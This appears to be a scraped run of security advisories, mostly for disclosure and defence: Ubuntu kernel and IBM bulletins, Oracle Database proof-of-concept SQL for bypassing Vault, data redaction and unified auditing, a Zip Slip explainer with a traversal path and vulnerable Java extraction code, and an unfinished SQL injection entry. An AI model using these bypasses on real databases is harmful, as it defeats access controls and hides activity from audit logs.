Ubuntu Security Notice 5790-1 - It was discovered that the BPF verifier in the Linux kernel did not properly handle internal data structures. A local attacker could use this to expose sensitive information. It was discovered that a race condition existed in the Android Binder IPC subsystem in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5790-1January 06, 2023linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15,linux-dell300x, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm,linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-dell300x: Linux kernel for Dell 300x platforms- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi2: Linux kernel for Raspberry Pi systems- linux-snapdragon: Linux kernel for Qualcomm Snapdragon processors- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe: Linux hardware enablement (HWE) kernel- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:It was discovered that the BPF verifier in the Linux kernel did notproperly handle internal data structures. A local attacker could use thisto expose sensitive information (kernel memory). (CVE-2021-4159)It was discovered that a race condition existed in the Android Binder IPCsubsystem in the Linux kernel, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2022-20421)It was discovered that the Intel 740 frame buffer driver in the Linuxkernel contained a divide by zero vulnerability. A local attacker could usethis to cause a denial of service (system crash). (CVE-2022-3061)Gwnaun Jung discovered that the SFB packet scheduling implementation in theLinux kernel contained a use-after-free vulnerability. A local attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2022-3586)Jann Horn discovered a race condition existed in the Linux kernel whenunmapping VMAs in certain situations, resulting in possible use-after-freevulnerabilities. A local attacker could possibly use this to cause a denialof service (system crash) or execute arbitrary code. (CVE-2022-39188)It was discovered that a race condition existed in the EFI capsule loaderdriver in the Linux kernel, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2022-40307)Zheng Wang and Zhuorao Yang discovered that the RealTek RTL8712U wirelessdriver in the Linux kernel contained a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2022-4095)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   linux-image-4.15.0-1058-dell300x  4.15.0-1058.63   linux-image-4.15.0-1112-oracle  4.15.0-1112.123   linux-image-4.15.0-1125-raspi2  4.15.0-1125.133   linux-image-4.15.0-1133-kvm     4.15.0-1133.138   linux-image-4.15.0-1142-gcp     4.15.0-1142.158   linux-image-4.15.0-1143-snapdragon  4.15.0-1143.153   linux-image-4.15.0-1147-aws     4.15.0-1147.159   linux-image-4.15.0-1158-azure   4.15.0-1158.173   linux-image-4.15.0-201-generic  4.15.0-201.212   linux-image-4.15.0-201-generic-lpae  4.15.0-201.212   linux-image-4.15.0-201-lowlatency  4.15.0-201.212   linux-image-aws-lts-18.04       4.15.0.1147.145   linux-image-azure-lts-18.04     4.15.0.1158.126   linux-image-dell300x            4.15.0.1058.57   linux-image-gcp-lts-18.04       4.15.0.1142.156   linux-image-generic             4.15.0.201.184   linux-image-generic-lpae        4.15.0.201.184   linux-image-kvm                 4.15.0.1133.124   linux-image-lowlatency          4.15.0.201.184   linux-image-oracle-lts-18.04    4.15.0.1112.117   linux-image-raspi2              4.15.0.1125.120   linux-image-snapdragon          4.15.0.1143.142   linux-image-virtual             4.15.0.201.184Ubuntu 16.04 ESM:   linux-image-4.15.0-1112-oracle  4.15.0-1112.123~16.04.1   linux-image-4.15.0-1142-gcp     4.15.0-1142.158~16.04.1   linux-image-4.15.0-1147-aws-hwe  4.15.0-1147.159~16.04.1   linux-image-4.15.0-201-generic  4.15.0-201.212~16.04.1   linux-image-4.15.0-201-lowlatency  4.15.0-201.212~16.04.1   linux-image-aws-hwe             4.15.0.1147.132   linux-image-gcp                 4.15.0.1142.134   linux-image-generic-hwe-16.04   4.15.0.201.186   linux-image-gke                 4.15.0.1142.134   linux-image-lowlatency-hwe-16.04  4.15.0.201.186   linux-image-oem                 4.15.0.201.186   linux-image-oracle              4.15.0.1112.94   linux-image-virtual-hwe-16.04   4.15.0.201.186Ubuntu 14.04 ESM:   linux-image-4.15.0-1158-azure   4.15.0-1158.173~14.04.1   linux-image-azure               4.15.0.1158.125After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5790-1   CVE-2021-4159, CVE-2022-20421, CVE-2022-3061, CVE-2022-3586,   CVE-2022-39188, CVE-2022-40307, CVE-2022-4095Package Information:   https://launchpad.net/ubuntu/+source/linux/4.15.0-201.212   https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1147.159   https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1158.173   https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1058.63   https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1142.158   https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1133.138   https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1112.123   https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1125.133   https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1143.153

Ubuntu Security Notice USN-5790-1

Oracle Database versions 12.1.0.2, 12.2.0.1, 18c, and 19c suffer from a vault metadata exposure vulnerability.

    Title: CVE-2021-2175 – Oracle Database Vault Metadata Exposure VulnerabilityProduct:                   DatabaseManufacturer:              OracleAffected Version(s):       12.1.0.2, 12.2.0.1, 18c, 19cTested Version(s):         19cRisk Level:                lowSolution Status:           FixedCVE Reference:             CVE-2021-2175Author of Advisory:        Emad Al-MousaOverview:Oracle database vault is a security feature that imposes segregation of duties such as account managemenet, authorization,....etc. So, in a nutshell a DBA/System Admin with access to "SYS" user has limited power in terms of data viewership, account creation,.....etc. The powers of SYS account are stripped down.*****************************************Vulnerability Details:Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any View, Select Any View privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Database Vault accessible data [Meta-data].*****************************************Proof of Concept (PoC):The DBA_DV_REALM data dictionary view lists the realms (security policies configured for data protection) created in the current database instance, such information SYS user by default has NO ACCESS to since it exposes what security measures of data protection is configured.Access the database as SYS account:sqlplus / as sysdbaSQL> SELECT *  FROM DBA_DV_REALM;ERROR at line 1:ORA-01031: insufficient privileges// as expected SYS account can't view the database view contents.....However...let us do the following:SQL> create view ORACLE_OCM.DUMMY_V as select * from DBA_DV_REALM;SQL> select * from ORACLE_OCM.DUMMY_V;// ORACLE_OCM account is misconfigured and was granted extra access to the view so when you create the view under it....you will be access the view content....and now you can see/view the vault realm policies are configured to protect what exactly within the database system.*****************************************References:https://www.oracle.com/security-alerts/cpuapr2021.htmlhttps://databasesecurityninja.wordpress.com/2022/02/02/cve-2021-2175-database-vault-metadata-exposure-vulnerability/https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-2175Credit:Emad Al-Mousa: CVE-2021-35576

Oracle Database Vault Metadata Exposure

IBM Business Automation Workflow 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, and 22.0.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 238054.

**Security Bulletin**

  

**Summary**

In addition to many updates of operating system level packages, the following security vulnerability is addressed with IBM Cloud Pak for Business Automation 21.0.3-IF016 and 22.0.1-IF006.

**Vulnerability Details**

**CVEID:**   CVE-2017-10355  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE related to the Java SE, Java SE Embedded, JRockit Networking component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/133784 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-42920  
**DESCRIPTION:**   Apache Commons BCEL could allow a remote attacker to bypass security restrictions, caused by an out-of-bounds write flaw in the APIs. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain control over the resulting bytecode than otherwise expected.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239562 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-2047  
**DESCRIPTION:**   Eclipse Jetty could allow a remote authenticated attacker to bypass security restrictions, caused by a flaw in the HttpURI class. By sending a specially-crafted request, an attacker could exploit this vulnerability to the HttpClient and ProxyServlet/AsyncProxyServlet/AsyncMiddleManServlet wrongly interpreting an authority with no host as one with a host.  
CVSS Base score: 2.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/230668 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2022-42435  
**DESCRIPTION:**   IBM Business Automation Workflow is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/238054 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Status

IBM Cloud Pak for Business Automation

V22.0.1 - V22.0.1-IF005

affected

IBM Cloud Pak for Business Automation

V21.0.3 - V21.0.3-IF015

affected

IBM Cloud Pak for Business Automation

V21.0.2 - V21.0.2-IF012 and later fixes  
V21.0.1 - V21.0.1-IF007 and later fixes  
V20.0.1 - V20.0.3 and later fixes  
V19.0.1 - V19.0.3 and later fixes  
V18.0.0 - V18.0.2 and later fixes

affected

  

**Remediation/Fixes**

Any open source library may be included in one or more sub-components of IBM Cloud Pak for Business Automation. Open source updates are not always synchronized across all components. The CVE in this bulletin are specifically addressed by

CVE ID

Addressed in component

CVE-2022-2047

Operational Decision Management component

CVE-2022-42435

Business Automation Workflow Component

CVE-2017-10355

Automation Decision Service Component

CVE-2022-42920

Business Automation Workflow / Workflow Process Service / Business Automation Studio

Affected Product(s)

Version(s)

Remediation / Fix

IBM Cloud Pak for Business Automation

V22.0.1 - V22.0.1-IF005

Apply security fix 22.0.1-IF006

IBM Cloud Pak for Business Automation

V21.0.3 - V21.0.3-IF015

Apply security fix 21.0.3-IF016 or upgrade to 22.0.1-IF006

IBM Cloud Pak for Business Automation

V21.0.1 - V21.0.1-IF008  
V20.0.1 - V20.0.3  
V19.0.1 - V19.0.3  
V18.0.0 - V18.0.2

Upgrade to 21.0.3-IF016 or 22.0.1-IF006

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

The vulnerability was reported to IBM by Man Shum, https://www.linkedin.com/in/man-shum/

**Change History**

30 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS2JQC","label":"IBM Cloud Pak for Automation"},"Component":"","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"18.0.0, 18.0.1,18.0.2,19.0.1,19.0.2,19.0.3,20.0.1,20.0.2,20.0.3,21.0.1,21.0.2,21.0.3,22.0.1","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSBYVB","label":"IBM Cloud Pak for Business Automation"},"Component":"","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"18.0.0, 18.0.1,18.0.2,19.0.1,19.0.2,19.0.3,20.0.1,20.0.2,20.0.3,21.0.1,21.0.2,21.0.3,22.0.1","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-42435: Security Bulletin: Security vulnerabilities are addressed with IBM Cloud Pak for Business Automation iFixes for December 2022

Prosys OPC UA Simulation Server version prior to v5.3.0-64 and UA Modbus Server versions 1.4.18-5 and prior do not sufficiently protect credentials, which could allow an attacker to obtain user credentials and gain access to system data.

16.12.2021

**OPC UA Manufacturing Gateway Demo**

OPC UA Manufacturing Gateway features OPC UA PubSub UDP and MQTT as well as OPC UA Process Automation Device Information Model (PA-DIM)

14.12.2021

**OPC UA PubSub Explained**

OPC UA PubSub is a new alternative communication model in addition to the traditional Client/Server model.

12.10.2018

**Getting Started with OPC UA (Videos)**

Watch the short videos to get a quick overview of how to get started with OPC UA end-user products or with development. They are represented by Jouni Aro, the CTO of Prosys OPC.

02.08.2016

**Oracle database with embedded OPC UA**

Oracle has recently endorsed OPC UA in its reference IoT (Internet of Things) architecture. In this solution OPC UA acts as a bridge between plant devices and plant management layers. In our recent customer case we integrated our Java OPC UA client directly with the Oracle database handling the plant data, enabling

24.06.2014

**Hadoop and Hive integration with OPC UA**

The big data seems to be the talk of the town at the moment. Enterprises in various fields are utilizing the concept, or at least say they do. This blog post tries to shed some light on the murky concept, along with introducing a demo case of Hadoop and OPC UA integration.

08.05.2014

**OPC UA in the Internet of Things**

The idea of connecting things other than dedicated computing devices to the Internet is by no means new. Various examples such as remotely controlled coffeemakers or refrigerators reporting their contents have circulated for several decades, but up until recently they have been little more than anecdotal in nature.

07.04.2014

**Opening Day at Hannover Messe**

It is the opening day for Hannover Messe, and yes it is a good day for us. There is definitely an increasing demand for Java based OPC UA tools and applications.

03.04.2014

**Information modeling features in the upcoming UA SDK**

The release of the 2.0 version of our Java SDK is just around the corner. In the new version, we are introducing new features that should help you to use information models in your UA applications.

11.02.2014

**Simulation Server Beta**

Prosys OPC UA Java Server has gone through major rework/development to become Prosys OPC UA Simulation Server.

20.12.2013

**OPC UA 1.02**

The OPC Foundation has recently released the version 1.02 of the specification and the stack components along with some sample applications and a new version of the Local Discovery Server (LDS).

04.12.2013

**GM applying OPC UA in production**

General Motors have given a presentation at the ARC World Industry Forum about their new MES/automation link, which they have based on OPC UA.

14.08.2013

**Raspberry Pi + Java SDK based OPC UA weather station**

We often get questions about developing to ARM platform using our Java SDK. This has been proven to be possible by our QEMU + ARM test setup. We decided that it would be nice to have also some demo running on real hardware.

20.05.2013

**OPC Day Europe 2013**

Yokogawa hosted the third annual OPC Day Europe in their European headquarters in Amersfoort, the Netherlands. Yokogawa provided great facilities for the event that gathered up 150 OPC enthusiasts from all over the Europe.

19.04.2013

**QEMU + ARM test setup**

From time to time we get inquiries regarding OPC UA server and client application suitability and performance on ARM platforms. This blog post is intended to serve as a starting point for users interested in testing Prosys Java applications on ARM platform virtual machine.

19.04.2013

**Prosys OPC at Hannover Messe**

Prosys OPC attended Hannover Messe 2013 in the second week of April. The leading industrial trade show in Europe gathered up 6 550 exhibitors from 62 nations and total of 225 000 attendees.

01.02.2013

**New OPC UA Applications**

Three new OPC UA products were released this week: OPC UA Java Client, OPC UA Android Client and OPC UA Java Server, all of them developed with the best OPC UA SDK in the market: Prosys OPC UA Java SDK.

16.01.2013

**Custom UA Enum Types in Java SDK**

Creating your own enumeration type and using it the server is not as straight forward as it first seems, but it is not very complicated either. You just need to get it done right.

04.12.2012

**Prosys OPC at SPS/IPC/Drives 2012**

Prosys OPC attended SPS/IPC/Drives 2012 in Nuremberg, Germany last week. The three-day exhibition gathered up almost 57 000 visitors and 1 458 exhibitors, Prosys OPC being one of the exhibitors at OPC Foundation booth.

28.11.2012

**OPC UA For ISA95**

The OPC Foundation has been developing several companion specifications to the OPC UA. One of these is OPC UA For ISA95, which is reaching the Release Candidate phase already.

16.11.2012

**Prosys OPC at IAS 2012, Shanghai**

Prosys OPC attended Industrial Automation Show 2012 in Shanghai China last week. During the five-day exhibition approximately 100 000 visitors had a change to take a look what’s going on in the various fields of industrial automation, introduced by more than 500 exhibitors.

15.10.2012

**OPC and MES Day & OPC UA Workshop 2012**

The annual OPC Day Finland was held for the 8th time last week on Tuesday. For the first time in its history it was organized with MES people, combining both OPC and MES tracks.

11.09.2012

**OPC UA & Wireshark**

Wireshark is a great tool for sniffing network traffic. It contains several pre-defined filters for various protocols – and yes, also OPC UA!

12.07.2012

**Using Complex DataTypes**

One of the great things in OPC UA is that when the base information models don’t fit your needs quite well enough, there are many options to extend the specifications. One common case where it’s nice to be able to extend the base spec is with Complex DataTypes.

29.05.2012

**OPC Day Europe 2012**

Prosys was sponsoring OPC Day Europe 2012 in Reinach, Switzerland on May 16th. The first OPC Day Europe was held in 2011, thus this year OPC Day Europe was organized for the second time and hosted by Endress+Hauser.

24.04.2012

**Connecting OPC Classic to OPC UA with OPC UA Gateway**

We get frequent questions about how to use OPC Unified Architecture in conjunction with OPC Classic servers. Regardless of the new technical details of OPC UA, we cannot get around the fact that majority of the communication systems worldwide are still running OPC Classic servers.

24.02.2012

**Developing OPC UA for Android**

I thought I’d share a few pointers about developing OPC UA on Android, since our Prosys OPC UA Java SDK has supported Android from version 1.3 onwards.

26.01.2012

**OPC UA Sessions, Subscriptions and Timeouts**

In this article I will try to clarify all the various parameters of OPC UA communications, especially related to the various timeouts that are available. They provide a flexible means to control the connection between the UA client and server, both on the client and server side, but it is not always very clear which parameter is which and what is the actual effect of each.

CVE-2022-2967: Blog - Prosys OPC

Proof of concept overview on how the DBMS_REDACT Dynamic Data Masking security feature in Oracle can be bypassed. Affected versions include 19c and 21c.

    Title: ByPassing DBMS_REDACT Dynamic Data Masking security feature in Oracle database systemProduct:                   DatabaseManufacturer:              OracleAffected Version(s):       19c,21cTested Version(s):         19c,21cCVE Reference:             N/AAuthor of Advisory:        Emad Al-MousaOverview:DBMS_REDACT package provides an interface to Oracle Data Redaction, which enables you to mask (redact) data that is returned from SQL queries. Basically, its dynamic data masking. security policies are configured and enabled through dbms_redact package. This is a security feature but doesn't provide a bullet proof data protection, as I will simulate how easily it can be bypassed and masked datacan be extracted/viewed.**************************************************Proof of Concept (PoC):In the database I will create a table called HR.TABLE2 and will create an index on SALES column and insert dummy tables.SQL> CREATE TABLE HR.TABLE2(  COMPANY_NAME  VARCHAR2(10 BYTE),  REGION   VARCHAR2(10 BYTE),  SALES      NUMBER(12),  DIVISION_NAME VARCHAR2(12)); SQL> CREATE INDEX HR.IDX_TABLE2_SALES ON HR.TABLE2(SALES);SQL> Insert into HR.TABLE2 values ('COMPANY_A','EU',120000000,'INDUSTRIAL');SQL> Insert into HR.TABLE2 values ('COMPANY_B','ASIA',170000000,'RETAIL');SQL> Insert into HR.TABLE2 values ('COMPANY_C','ME',40000000,'SHIPMENT');SQL> Insert into HR.TABLE2 values ('COMPANY_D','AFRICA',11000000,'FARMING');SQL> Insert into HR.TABLE2 values ('COMPANY_E','LATIN-AM',114000000,'SHIPMENT');SQL> Insert into HR.TABLE2 values ('COMPANY_F','NORTH-AM',190000000,'RETAIL');SQL> commit;I will create a redaction policy as SYS user against “SALES” column in the table HR.TABLE2:sqlplus / as sysdbaSQL> begin       dbms_redact.add_policy(       object_schema => 'HR',       object_name   => 'TABLE2',       column_name   => 'SALES',       policy_name   => 'REDACT_HR_SALES',       function_type => DBMS_REDACT.FULL,       expression    => '1=1');  end;/ I will create a user called "roro" in the pluggable database ORCLPDB1 with “create session” and "SELECT" permission ONLY on the table:sqlplus / as sysdbaSQL> alter session set container=ORCLPDB1;SQL> create user roro identified by dummy_123;SQL> grant select on HR.TABLE2 to roro;connecting using account roro to the database using "SQL Developer Tool" or SQLCL and execute the following command:info+ HR.TABLE2;The histogram data for SALES column will show the actual vaules stored in the redacted column.Conclusion: So the security feature was bypassed with no excessive privileges required to be granted to the database account, I utilized the info+ command only.**************************************************References:https://docs.oracle.com/database/121/ASOAG/introduction-to-oracle-data-redaction.htm#ASOAG852https://databasesecurityninja.wordpress.com/2023/01/03/bypassing-dbms_redact-dynamic-data-masking-security-feature-in-oracle-database-system/Thanks,Emad

Oracle DBMS_REDACT Dynamic Data Masking Bypass

Oracle versions 12.1.0.2, 12.2.0.1, and 19c suffer from a Unified Audit Policy bypass vulnerability.

    Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPassProduct:                   DatabaseManufacturer:              OracleAffected Version(s):       12.1.0.2, 12.2.0.1, 19cTested Version(s):         19cRisk Level:                lowSolution Status:           FixedManufacturer Notification: 2021-03-17Solution Date:             2021-10-17Public Disclosure:         2022-06-11CVE Reference:             CVE-2021-35576Author of Advisory:        Emad Al-MousaOverview:Oracle Database is a general purpose relational database management system (RDMBS).Unified Auditing is the supported mechanism to capture database audit logs. The unified audit trail captures audit information from a variety of sources.The unified audit trail, which resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, makes this information available in a uniform format in the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Database Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN and AUDIT_VIEWER roles can query these views. If your users only need to query the views but not create audit policies, then grant them the AUDIT_VIEWER role.*****************************************Vulnerability Details:The vulnerability will allow database administrator or system admin with access to the database server (either local login or remote authentication)to bypass a custom in-place audit policy defined in the oracle database system. Moreover, setting the database in upgrade mode will disable auditingand threat actor can perform malicious operations without detection.*****************************************Proof of Concept (PoC):I will create a table in pluggable database PDB1 under HR schema and insert few records:SQL> CREATE TABLE HR.EMPLOYEE(  FIRST_NAME  VARCHAR2(50),  LAST_NAME   VARCHAR2(50));SQL> INSERT INTO HR.EMPLOYEE (   FIRST_NAME, LAST_NAME)VALUES ( 'EMAD','MOUSA' );SQL> commit;SQL> INSERT INTO HR.EMPLOYEE (   FIRST_NAME, LAST_NAME)VALUES ( 'SAMI','MOUSA' );SQL> commit;I will now create audit policy:SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;SQL> audit policy SELECT_P1;To check audit policies configured in PDB1 database:SQL> SELECT * FROM audit_unified_enabled_policies;Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode:sqlplus / as sysdbaSQL> alter session set container=PDB1;SQL> shutdown immediate;SQL> startup upgrade;SQL> select * from HR.EMPLOYEE;SQL> startup force;SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;Checking the audit logs using the query, NO entry is found recorded in the unified audit trail:SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc;So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view !*****************************************References:https://www.oracle.com/security-alerts/cpuoct2021.html https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/https://nvd.nist.gov/vuln/detail/CVE-2021-35576Credit:Emad Al-Mousa: CVE-2021-35576

Oracle Unified Audit Policy Bypass

Due to improper path santization, archives containing relative file paths can cause files to be written (or overwritten) outside of the target directory.

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand crafted and shared among developer communities such as StackOverflow.

The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../evil.sh). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. If you’d like the information on this page in a downloadable technical white paper, click the button below.

Download Technical White Paper

Zip Slip is a form of directory traversal that can be exploited by extracting files from an archive. The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.

**Exploitable Application Flow**

The two parts required to exploit this vulnerability is a malicious archive and extraction code that does not perform validation checking. Let’s look through each of these in turn. First of all, the contents of the zip file needs to have one or more files that break out of the target directory when extracted. In the example below, we can see the contents of a zip file. It has two files, a good.sh file which would be extracted into the target directory and an evil.sh file which is trying to traverse up the directory tree to hit the root and then add a file into the tmp directory. When you attempt to cd .. in the root directory, you still find yourself in the root directory, so a malicious path could contain many levels of ../ to stand a better chance of reaching the root directory, before trying to traverse to sensitive files.

           
  5 Tue Jun 5 11:04:29 BST 2018 good.sh 20 Tue Jun 5 11:04:42 BST 2018 ../../../../../../../../tmp/evil.sh
          
  

The contents of this zip file have to be hand crafted. Archive creation tools don’t typically allow users to add files with these paths, despite the zip specification allowing it. However, with the right tools, it’s easy to create files with these paths.

The second thing you’ll need to exploit this vulnerability is to extract the archive, either using your own code or a library. The vulnerability exists when the extraction code omits validation on the file paths in the archive. An example of a vulnerable code snippet (example shown in Java) can be seen below.

     
  1   Enumeration<ZipEntry>entries = zip.getEntries(); 
  2   while (entries.hasMoreElements()) { 
  3       ZipEntry e = entries.nextElement(); 
  4       File f = new File(destinationDir, e.getName()); 
  5       InputStream input = zip.getInputStream(e); 
  6       IOUtils.copy(input, write(f)); 
  7   }
          
  

You can see on line 4, e.getName() is concatenated with the target directory, dir, without being validated. At this point, when our zip archive gets to our evil.sh, it will append the full path (including every ../) of the zip entry to the target directory resulting in evil.sh being written outside of the target directory.

To see Zip Slip in action,

watch us exploit the vulnerable java-goof application

, a sample application used to show many known vulnerabilities.

**Are you Vulnerable?**

You are vulnerable if you are either using a library which contains the Zip Slip vulnerability or your project directly contains vulnerable code, which extracts files from an archive without the necessary directory traversal validation. Snyk is maintaining a GitHub repository listing all projects that have been found vulnerable to Zip Slip and have been responsibly disclosed to, including fix dates and versions. The repository is open to contributions from the wider community to ensure it holds the most up to date status.s.

**What action should you take?**

Here are some steps you can take to check if your project’s dependencies of code contain the Zip Slip vulnerability:

**1\. Search through your projects for vulnerable code.**  

Expand this section

Groovy

Expand this section

JavaScript

Expand this section

Ruby & Python

**2\. Add Zip Slip Security Testing to your application build pipeline**

If you’d prefer not to search through your direct and transitive dependencies (of which you likely have hundreds) to determine if you’re using a vulnerable library, you can choose a dependency vulnerability scanning tool, like Snyk. It’s a good practice to add security testing into your development lifecycle stages, such as during development, CI, deployment and production. You can test your own projects (all the ecosystems mentioned above are supported) to determine if they are vulnerable to Zip Slip.

**Other vulnerable projects**

Vulnerable projects include projects in various ecosystems that either use the libraries mentioned above or directly include vulnerable code. Of the many thousands of projects that have contained similar vulnerable code samples or accessed vulnerable libraries, the most significant include: Oracle, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Jenkinsci, Eclipse, OWASP, SonarQube, OpenTable, Arduino, ElasticSearch, Selenium, JetBrains and Google.

**Thank you!**

The Snyk security team would like for thank all the vendors, project owners and the community members that helped raise awareness, find and fix vulnerabilities in projects across many ecosystems.

CVE-2020-36566: Snyk Vulnerability Database | Snyk

Shilpi CAPExWeb 1.1 allows SQL injection via a servlet/capexweb.cap_sendMail GET request.

**Description**

The GET request parameters in servlet/capexweb.cap\_sendMail are vulnerable to SQL Injection. An unauthenticated user can take over the database of the application.

**Proof of concept: (POC)**

The following vulnerability was tested on CAPExWeb version 1.1 Product.

